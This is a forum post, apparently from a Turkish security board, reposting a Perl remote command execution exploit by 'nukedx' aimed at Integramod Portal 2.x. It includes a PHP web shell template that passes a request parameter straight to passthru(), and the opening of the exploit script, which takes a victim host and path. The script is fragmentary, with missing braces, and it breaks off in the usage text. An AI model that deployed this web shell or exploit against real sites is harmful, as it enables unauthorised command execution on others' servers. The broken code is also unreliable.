Integramod Portal <= 2.x Remote Command Execution Exploit


Katılımcı Üye
7 Ara 2007
Dünyanın Tam ortası
# Method found and exploit scripted by nukedx
# Contacts> ICQ: 10072 Web:[email protected]:// MAIL/MSN: [email protected]
# Original advisory can be found at:
# Integramod Portal <= 2.x Remote Command Execution Exploit
# This exploit comes with it's own php shell setting. If you wanna change it your file must contain this data >
# <?php
# echo "_START_\n";
# ini_set("max_execution_time",0);
# error_reporting(0);
# passthru($_REQUEST[command]);
# echo "\n_END_";
# ?>
# Copyright 2006 (C) nukedx
# Greetz to: WW,xT,php from my team NWPX , str0ke , cha0s , Preddy , Yns , |SaMaN|, Caesar , Ogre and all of my friends
use IO::Socket;
# Default configuration
$shell = " ";
# Checking user settings
if(@ARGV != 2) { usage(); }
else { exploit(); }
sub header()
print "\n- NukedX Security Advisory Nr.2006-43\r\n";
print "- Integramod Portal<= 2.x Remote Command Execution Exploit\r\n";
sub usage()
print "- Usage: $0 <host> <path>\r\n";
print "- <host> -> Victim's host ex:\
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